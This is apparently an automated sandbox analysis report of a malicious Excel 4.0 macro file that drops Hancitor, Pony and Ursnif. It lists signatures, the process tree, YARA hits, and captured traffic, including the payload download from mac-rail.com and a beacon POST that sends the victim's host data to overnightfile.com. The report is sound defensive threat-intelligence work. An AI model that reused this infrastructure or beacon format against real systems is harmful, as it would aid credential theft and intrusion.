
Analysis Report tr_0.xls

Overview

General Information

Sample Name: tr_0.xls
MD5: 08f03e9133419730830daa1d5c05f2ea
SHA1: 0fbe4abe79048fb25f00e11c3f53b9729ea2019b
SHA256: ee2dc4300f18802a18616e9e5434b2a0d438c819d2229d3724fa266ae881dbf7

Detection

Hidden Macro 4.0 Ursnif Hancitor Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

  • Antivirus detection for dropped file
  • Detected unpacking (changes PE section rights)
  • Detected unpacking (overwrites its own PE header)
  • Document exploit detected (creates forbidden files)
  • Document exploit detected (drops PE files)
  • Malicious sample detected (through community Yara rule)
  • Multi AV Scanner detection for domain / URL
  • Multi AV Scanner detection for dropped file
  • Multi AV Scanner detection for submitted file
  • Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • System process connects to network (likely due to code injection or exploit)
  • Yara detected Ursnif
  • Yara detected Hancitor
  • Yara detected Pony
  • Allocates memory in foreign processes
  • Creates a COM Internet Explorer object
  • Document exploit detected (UrlDownloadToFile)
  • Document exploit detected (process start blacklist hit)
  • Drops PE files to the document folder of the user
  • Found abnormal large hidden Excel 4.0 Macro sheet
  • Found evasive API chain (may stop execution after checking locale)
  • Injects a PE file into a foreign processes
  • Machine Learning detection for dropped file
  • Office process drops PE file
  • Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
  • Tries to harvest and steal browser information (history, passwords, etc)
  • Tries to harvest and steal ftp login credentials
  • Tries to steal Crypto Currency Wallets
  • Tries to steal Mail credentials (via file access)
  • Tries to steal Mail credentials (via file registry)
  • Writes or reads registry keys via WMI
  • Writes registry values via WMI
  • Writes to foreign memory regions
  • Yara detected aPLib compressed binary
  • Antivirus or Machine Learning detection for unpacked file
  • Checks if the current process is being debugged
  • Contains functionality locales information (e.g. system language)
  • Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
  • Contains functionality to call native functions
  • Contains functionality to check if a debugger is running (IsDebuggerPresent)
  • Contains functionality to dynamically determine API calls
  • Contains functionality to enumerate network shares
  • Contains functionality to execute programs as a different user
  • Contains functionality to read the PEB
  • Contains functionality which may be used to detect a debugger (GetProcessHeap)
  • Creates a DirectInput object (often for capturing keystrokes)
  • Creates a process in suspended mode (likely to inject code)
  • Creates files inside the system directory
  • Detected potential crypto function
  • Downloads executable code via HTTP
  • Drops PE files
  • Enables debug privileges
  • Extensive use of GetProcAddress (often used to hide API calls)
  • Found dropped PE file which has not been started or loaded
  • Found evasive API chain checking for process token information
  • Found potential string decryption / allocating functions
  • Internet Provider seen in connection with other malware
  • JA3 SSL client fingerprint seen in connection with other malware
  • May sleep (evasive loops) to hinder dynamic analysis
  • One or more processes crash
  • PE file contains strange resources
  • Queries disk information (often used to detect virtual machines)
  • Queries the installation date of Windows
  • Queries the volume information (name, serial number etc) of a device
  • Sample execution stops while process was sleeping (likely an evasion)
  • Tries to load missing DLLs
  • Uses Microsoft's Enhanced Cryptographic Provider
  • Uses code obfuscation techniques (call, push, ret)
  • Yara detected Xls With Macro 4.0
  • Yara signature match

Classification

Startup

  • System is w10x64_office
  • EXCEL.EXE (PID: 5920 cmdline: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding MD5: D672D26C85AEB9536B9736BF04054969)
    • regsvr32.exe (PID: 4912 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
      • svchost.exe (PID: 5128 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • cmd.exe (PID: 4256 cmdline: cmd /K MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • svchost.exe (PID: 3708 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • BN6D10.tmp (PID: 1940 cmdline: C:\Users\user\AppData\Local\Temp\BN6D10.tmp MD5: 5105430437588F8878DA6957BC8C3119)
      • WerFault.exe (PID: 744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696 MD5: 80E91E3C0F5563E4049B62FCAF5D67AC)
  • iexplore.exe (PID: 5712 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5356 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5752 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
tr_0.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x142a2:$s1: Excel
  • 0x15301:$s1: Excel
  • 0x3225:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
tr_0.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp | Ursnif | detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory | JPCERT/CC Incident Response Group
  • 0xbca:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x89a:$c1: version=%u
  • 0xbd2:$c1: version=%u
  • 0x8ad:$c2: user=%08x%08x%08x%08x
  • 0xbdd:$c2: user=%08x%08x%08x%08x
  • 0x8c3:$c3: server=%u
  • 0xbf3:$c3: server=%u
  • 0x8cd:$c4: id=%u
  • 0xbfd:$c4: id=%u
  • 0x8db:$c7: name=%s
  • 0x8a5:$c8: soft=%u
  • 0xbca:$c8: soft=%u
0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmp | Ursnif | detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory | JPCERT/CC Incident Response Group
  • 0xbca:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x89a:$c1: version=%u
  • 0xbd2:$c1: version=%u
  • 0x8ad:$c2: user=%08x%08x%08x%08x
  • 0xbdd:$c2: user=%08x%08x%08x%08x
  • 0x8c3:$c3: server=%u
  • 0xbf3:$c3: server=%u
  • 0x8cd:$c4: id=%u
  • 0xbfd:$c4: id=%u
  • 0x8db:$c7: name=%s
  • 0x8a5:$c8: soft=%u
  • 0xbca:$c8: soft=%u
00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp | Hancitor | Hancitor Payload | kevoreilly
  • 0x18cf:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmp | Ursnif | detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory | JPCERT/CC Incident Response Group
  • 0xbca:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x89a:$c1: version=%u
  • 0xbd2:$c1: version=%u
  • 0x8ad:$c2: user=%08x%08x%08x%08x
  • 0xbdd:$c2: user=%08x%08x%08x%08x
  • 0x8c3:$c3: server=%u
  • 0xbf3:$c3: server=%u
  • 0x8cd:$c4: id=%u
  • 0xbfd:$c4: id=%u
  • 0x8db:$c7: name=%s
  • 0x8a5:$c8: soft=%u
  • 0xbca:$c8: soft=%u

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.svchost.exe.2440000.0.unpack | Hancitor | Hancitor Payload | kevoreilly
  • 0xccf:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
6.3.svchost.exe.5800000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
5.2.regsvr32.exe.46c0000.1.raw.unpack | Hancitor | Hancitor Payload | kevoreilly
  • 0x1ccf:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
13.2.BN6D10.tmp.ef0000.1.unpack | Ursnif | detect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memory | JPCERT/CC Incident Response Group
  • 0x941f:$f1: 56 57 BE 90 C2 EF 00 8D 7D F4 A5 A5 A5
  • 0x90cf:$f2: 35 8F E3 B7 3F
  • 0x90fc:$f3: 35 0A 60 2E 51
6.3.svchost.exe.5100000.3.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | Avira: detection malicious, Label: TR/AD.ZDlder.phzid
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Avira: detection malicious, Label: TR/Crypt.Agent.sxpge
Source: C:\Users\user\Documents\dDdoiBj.ocx | Avira: detection malicious, Label: TR/AD.ZDlder.phzid
Multi AV Scanner detection for domain / URL
Source: mac-rail.com | Virustotal: Detection: 6%
Source: gaw.explik.at | Virustotal: Detection: 6%
Source: low.explik.at | Virustotal: Detection: 8%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Virustotal: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | ReversingLabs: Detection: 54%
Source: C:\Users\user\Documents\dDdoiBj.ocx | Virustotal: Detection: 47%
Source: C:\Users\user\Documents\dDdoiBj.ocx | Metadefender: Detection: 13%
Source: C:\Users\user\Documents\dDdoiBj.ocx | ReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted file
Source: tr_0.xls | Virustotal: Detection: 20%
Source: tr_0.xls | ReversingLabs: Detection: 16%
Yara detected Pony
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\dDdoiBj.ocx | Joe Sandbox ML: detected
Source: 13.0.BN6D10.tmp.400000.0.unpack | Avira: Label: TR/Crypt.Agent.sxpge
Source: 13.2.BN6D10.tmp.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.3.svchost.exe.5c00000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 6.3.svchost.exe.5800000.0.unpack | Avira: Label: TR/Kryptik.avp.8
Source: 13.3.BN6D10.tmp.d80000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 6.2.svchost.exe.2440000.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 6.2.svchost.exe.10000000.3.unpack | Avira: Label: TR/Kryptik.avp.8
Source: 6.3.svchost.exe.5100000.3.unpack | Avira: Label: TR/Patched.Ren.Gen

Location Tracking:

Yara detected Hancitor
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4912, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442F20 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442F20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442FC8 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442F60 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442FE8 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442FE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442F9E CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442F9E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10007E6C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,6_2_10007E6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10007CB1 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,6_2_10007CB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_100080E0 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,6_2_100080E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_100090E3 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,6_2_100090E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10009DB0 lstrlenA,CryptUnprotectData,LocalFree,6_2_10009DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_100043D4 CryptUnprotectData,LocalFree,6_2_100043D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC01507 NetUserEnum,LocalAlloc,NetApiBufferFree,12_2_0BC01507
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_100068C0 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_100068C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000419E FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000419E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10004DF4 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,6_2_10004DF4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10007241 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10007241
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_10004A84 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10004A84
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_1000673C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000673C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC01FD3 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_0BC01FD3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC03D27 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_2_0BC03D27
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 12_2_0BC06401 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_0BC06401
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\idb\
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\
Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: 434[1].dll.1.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2014411 ET TROJAN Fareit/Pony Downloader Checkin 2 192.168.1.102:49708 -> 91.218.231.226:80
Source: Traffic | Snort IDS: 2014411 ET TROJAN Fareit/Pony Downloader Checkin 2 192.168.1.102:49711 -> 91.218.231.226:80
Creates a COM Internet Explorer object
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmp | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
    Server: nginx
    Date: Tue, 14 Jul 2020 09:20:24 GMT
    Content-Type: application/octet-stream
    Content-Length: 375808
    Connection: keep-alive
    Last-Modified: Mon, 13 Jul 2020 09:45:24 GMT
    ETag: "5f0c2d34-5bc00"
    Accept-Ranges: bytes
Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View | ASN Name: SELECTELRU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 6_2_02442250 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,6_2_02442250
Source: global traffic | HTTP traffic detected: GET /434.dll HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: mac-rail.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: api.ipify.org
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /webstore/kForBNOkuld/PMlfu1v0euSE_2/BxUhIJ7s_2Bzsa3aIvWWg/Plua7gYt6_2FPIim/H4JsNRqeFEmy2x5/kCDFDTJH_2B7v1zAt2/t_2By1xSF/iMqjoVQSyKnC4pmTEnMd/1Nda0IQeuWzmdIehoi2/vu8izqslTvsQLEp4RIGngf/VgE_2FejxR85f/5NpXiZBQ/xEFQXgMm80LfNjSS6LprzNc/_2FfZF02zj/WlTRAb5yIVLFDvRRQ/LisJTjFikyCJ/yXE4xWGBJrB/Twnb9Gc_0A_0Dt/NJP19L6X6zblGIbP5vDvW/9wRCcLW0TAdw4379/wFyXjYIF/T HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gaw.explik.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /webstore/Wn2lrwDcfADSyX9Xa/bQ9IeTtb06T_/2Fyc5Du3a5C/Lbn9mkIxBLN4KS/0RiYslQln2uSb526_2FZm/fNkDBZePuZrATiQn/27jcpwDh1RA4upt/WsONFtTjnt3E_2FciB/BuyJhj2lU/e7KhPQjbhtvsi_2BPEBm/dqg6KCxr123lryjC_2B/rsW0LaJL29JZD0HTL3n3by/0dLhDac4FZAm6/Cll4ZY31/36smpDyOWwQEQIQyBeyPrxB/AWWgeCY_2F/D0kB9OWlNSI7FBMD_/0A_0D0wKzQLR/qdmLCTbzmUv/6Bzg_2F16y0cMp/8eIeLRZDfPXuShbQ/W HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: gaw.explik.at
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /webstore/AOTtVIIFCyCl/rwHdKEZcyQz/zhsxqwtz0yJYCb/7wUwfdl67qUD5HOfnxeCy/4K2RFYcLg8x3JVwy/HHqS5FYbT5LR812/3drnDFI56W2PMZ4T3B/Z2k1S5bLG/ggEuoPBYFVY9Ucp4X2wJ/fxiLjJeTe5E6Iv80mkC/IkwsZL_2F_2BeRu3yeL0kw/Iz7Rtfj8FmL6o/19PNHBMl/ZMvH4neYIcicG6MljnDN_2B/AEobh9WXfv/6OZ5eYjqbttNmOt00/h6KBLnTcHE_0/A_0DXlYD3rU/jMSlmxbL3fthS_/2BwqQVILC1SW2R8JiDYGM/FJdHfBp4_2FZn6db/50iMd53h_2BkoMJ/H HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Accept-Language: en-US
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: low.explik.at
    Connection: Keep-Alive
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x3531f250,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x3542a2ec,0x01d659c0</date><accdate>0x3542a2ec,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: svchost.exe, 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormDatahttp://www.facebook.com/ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.440869721.0000000005800000.00000004.00000001.sdmp | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormDatahttp://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_**ftp://SspiPfcB equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.460854186.0000000005C00000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.481704878.000000000BC00000.00000040.00000001.sdmp | String found in binary or memory: [multi-line string dump]
          Source: svchost.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: unknown | DNS traffic detected: queries for: mac-rail.com
          Source: unknown | HTTP traffic detected:
              POST /4/forum.php HTTP/1.1
              Accept: */*
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Host: overnightfile.com
              Content-Length: 111
              Cache-Control: no-cache
              Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
              Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
          Source: global traffic | HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx
              Date: Tue, 14 Jul 2020 09:21:20 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              Content-Encoding: gzip
              Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a
